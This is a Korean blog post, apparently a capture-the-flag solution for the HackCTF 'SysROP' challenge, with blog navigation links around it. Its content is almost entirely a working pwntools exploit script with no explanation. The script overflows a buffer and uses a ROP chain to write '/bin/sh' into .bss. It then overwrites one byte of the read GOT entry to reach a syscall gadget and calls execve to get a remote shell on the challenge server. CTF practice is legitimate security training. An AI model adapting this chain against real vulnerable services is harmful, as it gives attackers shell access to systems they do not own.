ii4gsp
HackCTF - SysROP 본문
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3024)
e = ELF('./sysrop')
libc = ELF('./libc.so.6')
payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(8)
payload += p64(0)
payload += p64(e.bss() + 0x100)
payload += p64(e.plt['read'])
payload += p64(0x4005f2)
r.sendline(payload)
sleep(0.1)
r.send('/bin/sh\x00')
sleep(0.1)
payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(1)
payload += p64(0)
payload += p64(e.got['read'])
payload += p64(e.plt['read'])
payload += p64(0x00000000004005ea)
payload += p64(59)
payload += p64(0x0)
payload += p64(e.bss() + 0x100)
payload += p64(0x0)
payload += p64(e.plt['read'])
r.sendline(payload)
sleep(0.1)
r.send('\x5e')
sleep(0.1)
r.interactive()Exploit
'시스템 해킹 > HackCTF' 카테고리의 다른 글
| HackCTF - Unexploitable #2 (0) | 2020.11.26 |
|---|---|
| HackCTF - RTC (0) | 2020.05.05 |
| HackCTF - Unexploitable #1 (0) | 2020.05.05 |
| HackCTF - You are silver (0) | 2020.03.05 |
| HackCTF - ROP (0) | 2020.02.21 |
'시스템 해킹/HackCTF' Related Articles
more
Comments